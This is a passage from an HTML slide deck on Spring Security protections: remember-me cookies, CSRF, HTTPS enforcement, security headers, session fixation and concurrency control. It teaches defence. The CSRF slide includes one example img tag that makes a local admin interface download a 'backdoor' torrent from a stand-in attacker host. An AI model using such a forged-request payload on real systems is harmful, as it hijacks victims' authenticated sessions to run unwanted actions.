<li>a new token is generated but the series part is kept the same; the data is updated in the DB and a new cookie is sent to the browser</li>
<li>if the username and series are present but the token does not match, theft is assumed - the user receives a warning and all of the user's remembered sessions are deleted</li>
<li>if the username and series are not present, the login cookie is ignored.</li>
</ol>
</div>
<div style="float: left; margin-left: 2em; width: 45%; font-size: 80%;">
<h3>Disadvantages</h3>
<ul style="width: 100%">
<li>CSRF window is still open wide</li>
<li>when stolen, it opens up the app to the attacker</li>
<li>requires persistent storage</li>
<li>if the DB is leaked, attackers can log in as any user using a remember-me cookie
(<a href="http://security.stackexchange.com/questions/63435/why-use-an-authentication-token-instead-of-the-username-password-per-request/63438#63438">see this article</a>)</li>
</ul>
<h3 style="margin-top: 1em">Advantages</h3>
<ul style="width: 100%">
<li>user name is not revealed</li>
<li>password is not revealed</li>
<li>when stolen, user gets informed on next login</li>
<li>when stolen, the attacker loses access on the user's next login</li>
</ul>
</div>
</section>
</section>
<!-- CSRF -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="fade-in fade-out">
<h1>Cross-site request forgery</h1>
<p>A technique that abuses an existing authenticated session to execute operations via HTTP requests invisible
to the user, using well-known URLs and parameters.</p>
<ol>
<li>user logs in to an administration</li>
<li>user opens attacker site (in the same or different tab)</li>
<li>the attacker's site contains IMG/SCRIPT/STYLE elements that target the administration URL
with appropriate parameters to execute actions</li>
</ol>
<pre><code><img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent"></code></pre>
<p><em>The HTTP GET method is the easiest to abuse; other methods require social engineering or JavaScript to execute, but they are not hard to do either.</em></p>
</section>
<section data-transition="fade-in fade-out">
<h1>CSRF protection</h1>
<ul>
<li>Referer header check (not entirely recommended)</li>
<li>requesting unique CSRF token in HTTP request (as parameter or header, not cookie!)</li>
</ul>
<p><em style="font-size: 75%">Originally Spring Security used <a href="https://spring.io/blog/2013/08/21/spring-security-3-2-0-rc1-highlights-csrf-protection/">CSRF token per request</a>
but it was quite impractical (browser back button, partial update) and thus CSRF token is now unique to session.</em></p>
<h3>Things to consider</h3>
<ul>
<li>CSRF protection needs to be part of login & logout process</li>
<li>JavaScript / AJAX calls can copy the contents of the <code>XSRF-TOKEN</code> cookie into the <code>X-XSRF-TOKEN</code> HTTP header (an attacker can't do this thanks to the <em>same-origin policy</em>) ... see
<a href="http://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/csrf.html#csrf-cookie">CookieCsrfTokenRepository</a></li>
<li>Multipart form posts are harder to protect - the entire body must be processed before CSRF protection can apply</li>
<li>CSRF tokens SHOULD NOT be used in GET requests because the token can leak via the Referer header. Use the CSRF token only in HTTP POST actions that produce protected side effects.</li>
<li>Beware of the <a href="https://www.fg.cz/cs/deje-se/prolomeni-sifrovaneho-protokolu-https-10930">BREACH & HEIST attacks</a></li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>CSRF protection</h1>
<h2>Ultimate solution</h2>
<p>The new W3C proposal <a href="https://github.com/mikewest/internetdrafts/tree/master/first-party-cookies">First-Party-Only-Cookies</a> suggests a <strong>SameSite</strong> cookie attribute
that could bring an end to CSRF attacks entirely.</p>
<div style="float: left; width: 65%; font-size: 80%; margin-left: 2em;">
<iframe src="http://caniuse.com/#feat=same-site-cookie-attribute" title="Can I use: SameSite cookie attribute" frameborder="0" width="100%" height="450px"></iframe>
</div>
<div style="float: left; margin-left: 2em; width: 25%; font-size: 80%;">
<p>Targeted for all types of authentication cookies.</p>
<h3>Two possible modes</h3>
<ul>
<li><strong>LAX</strong><br>allows authentication cookies to be used in top-level navigations</li>
<li><strong>STRICT</strong><br>authentication cookies won't be sent at all when the request is initiated from another site</li>
</ul>
</div>
</section>
</section>
<!-- CHANNEL SECURITY -->
<section data-background="img/backgrounds/brown.jpg">
<h1>Channel security</h1>
<img class="plain" src="img/spring-security/ssl.png" alt="SSL" style="width: 25%; float: left">
<div style="text-align: left; float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<p>Allows you to set up simple rules for SSL / plain HTTP protocol enforcement.</p>
<pre style="display: inline-block;"><code class="xml" data-trim><http>
<intercept-url pattern="/secure/**" requires-channel="https"></intercept-url>
<intercept-url pattern="/css/**" requires-channel="http"></intercept-url>
<intercept-url pattern="/**" requires-channel="any"></intercept-url>
<port-mappings>
<port-mapping http="9080" https="9443"></port-mapping>
</port-mappings>
</http></code></pre>
<div style="text-align: center">
<p>You don't have any excuse not to encrypt.</p>
<a href="https://letsencrypt.org/">
<img class="plain" src="img/spring-security/lets-encrypt.png" alt="Let's Encrypt" style="width: 50%">
</a>
</div>
</div>
</section>
<!-- SECURITY HEADERS -->
<section data-background="img/spring-security/security_header.jpg" data-background-color="black" data-background-size="30%" data-background-position="left">
<section data-transition="fade-in fade-out">
<h1>Security headers</h1>
<div style="text-align: left; margin-left: 8em;">
<p>These are defaults:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block</code></pre>
<p>By only declaring:</p>
<pre style="display: inline-block;"><code class="xml" data-trim><http>
<headers defaults-disable="false"></headers>
</http></code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>X-Content-Type-Options</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-Content-Type-Options: nosniff</code></pre>
<p>Tells browsers (Chrome, IE) not to guess the content type of a document from its content.</p>
<p>Attack scenario: a malicious user uploads a PDF file that contains JavaScript. Your server
lets other users download that file and open it in their browser. Even if the server supplies
the PDF content type, the browser might decide not to trust it and detect the content type from the contents of the
file. It then handles the PDF file as JavaScript and executes the script.</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>HTTP Strict Transport Security (HSTS)</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Strict-Transport-Security: max-age=31536000 ; includeSubDomains</code></pre>
<p>Tells the browser that all resources on this domain must be fetched over HTTPS.</p>
<p>Except for the first request, all subsequent ones are loaded over HTTPS by the browser, even if there is an explicit link using the HTTP protocol.</p>
<pre style="display: inline-block;"><code class="xml" data-trim><img src="http://myserver.cz/img/someimage.jpg"></code></pre>
<p>First request problem can be solved with <a href="https://hstspreload.appspot.com/">HSTS Preload</a></p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>HTTP Public Key Pinning (HPKP)</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Public-Key-Pins-Report-Only: max-age=5184000;
pin-sha256="d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM=";
pin-sha256="E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=";
report-uri="http://example.net/pkp-report";
includeSubDomains</code></pre>
<p>Tells the browser that the public key in the server certificate must match one of the presented SHA-256 hashes. Protects you against a compromised CA.</p>
<p>Trust on First Use: the pin is only as trustworthy as the first connection. Note that major browsers have since dropped HPKP support, largely because a wrong pin can lock users out of a site.</p>
<p>When using <code style="font-size: 80%">Public-Key-Pins</code> and the server delivers an unknown public key, the client should present a warning to the user.</p>
<p>Reports can be processed with <a href="https://report-uri.io/">Report URI service</a></p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>X-Frame-Options</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-Frame-Options: deny</code></pre>
<p>Tells the browser not to render your pages inside a frame (or only inside frames from your own / a specified origin), which prevents clickjacking.</p>
<p>Standardized as part of Content Security Policy (the <code>frame-ancestors</code> directive).</p>
<p>Alternative variants:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-Frame-Options: deny
X-Frame-Options: sameorigin
X-Frame-Options: allow-from www.seznam.cz</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>X-XSS-Protection</h1>
<div style="text-align: left; margin-left: 8em;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-XSS-Protection: 1; mode=block</code></pre>
<p>Asks the browser to help defend against reflected XSS attacks. (Modern browsers have since removed this filter; rely on CSP instead.)</p>
<p>If the browser <a href="https://blogs.msdn.microsoft.com/ie/2008/07/02/ie8-security-part-iv-the-xss-filter/">detects a suspicious script</a> in the request that is reflected in the server response, the script is blocked or reported.</p>
<p>Alternative variant:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>X-XSS-Protection: 1; report=https://report-uri.io/</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Content Security Policy (CSP)</h1>
<div style="text-align: left; margin-left: 8em; height: 800px;">
<p>Header example:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Content-Security-Policy: script-src 'self' https://trustedscripts.example.com;
report-uri /csp-report-endpoint/</code></pre>
<p>The site tells the browser from which sources it expects to load resources.</p>
<p>Documentation at <a href="https://content-security-policy.com/">https://content-security-policy.com</a></p>
<p>Alternative variant:</p>
<pre style="display: inline-block;"><code class="xml" data-trim>Content-Security-Policy-Report-Only: script-src 'self';
report-uri /csp-report-endpoint/</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Content Security Policy (CSP)</h1>
<div style="text-align: left; margin-left: 8em; height: 800px;">
<img src="img/spring-security/csp.png" alt="CSP overview">
</div>
</section>
</section>
<!-- SESSION MANAGMENT -->
<section data-background="img/backgrounds/binary-code.jpg">
<section data-transition="fade-in fade-out">
<h1>Session management</h1>
<p>After successful authentication all registered
<a href="http://localhost:8091/?message=org/springframework/security/web/authentication/session/SessionAuthenticationStrategy.java">SessionAuthenticationStrategy</a>
instances are called.<br>Built-in implementations provide:
</p>
<ul>
<li>session fixation protection</li>
<li>concurrency control</li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>Session fixation protection</h1>
<p><strong>Attack vector:</strong> The attacker creates their own session in the application,
then via social engineering sends the user a link (or uses a similar technique) that makes the user's
browser use the already existing attacker session. When the user logs in, the attacker can act on
behalf of the user.
</p>
<h3>Defense</h3>
<div style="float: left; width: 45%; font-size: 80%; margin-left: 2em;">
<p>Don't accept the session id from the URL by configuring web.xml:</p>
<pre style="display: inline-block;"><code class="xml" data-trim><session-config>
<tracking-mode>COOKIE</tracking-mode>
</session-config></code></pre>
<ul style="font-size: 70%">
<li>COOKIE</li>
<li>URL</li>
<li>
<a href="http://download.oracle.com/otn-pub/jcp/servlet-3.0-fr-eval-oth-JSpec/servlet-3_0-final-spec.pdf?AuthParam=1471606619_c6d486d96c4d3110d045d7027578a40e">SSL</a> (chapter 7.1.2)</li>
</ul>
</div>
<div style="float: left; width: 47%; font-size: 80%; margin-left: 2em;">
<p>Create new session on user login:</p>
<pre style="display: inline-block;"><code class="xml" data-trim><session-management session-fixation-protection="migrateSession"/></code></pre>
<ul style="font-size: 70%">
<li>newSession (clean)</li>
<li>migrateSession (copy)</li>
<li>changeSessionId (Servlet 3.1)</li>
</ul>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Concurrency control</h1>
<p>Spring Security can track all sessions in <a href="http://localhost:8091/?message=org/springframework/security/core/session/SessionRegistry.java">SessionRegistry</a>.</p>
<pre style="display: inline-block;"><code class="xml" data-trim><session-management>
<concurrency-control max-sessions="1" error-if-maximum-exceeded="true" expired-url="/sessionExpired.html"/>
</session-management></code></pre>
<p>When <em>error-if-maximum-exceeded</em> is false and <em>max-sessions</em> is exceeded, the least recently used session is invalidated.
The user of that session will be shown the <em>expired-url</em> page.</p>
</section>
</section>
<!-- OUTRO AGAIN -->
<section data-background="img/backgrounds/black.jpg">
<img src="img/backgrounds/attention.jpg" alt="" width="800">
<h2>Thank you for your attention</h2>
<p>Contact me at <a href="https://www.twitter.com/novoj">@Novoj</a> or <a href="mailto:[email protected]">[email protected]</a></p>
</section>
</div>
<!-- REFERENCE: http://stackoverflow.com/questions/549/the-definitive-guide-to-form-based-website-authentication -->
</div>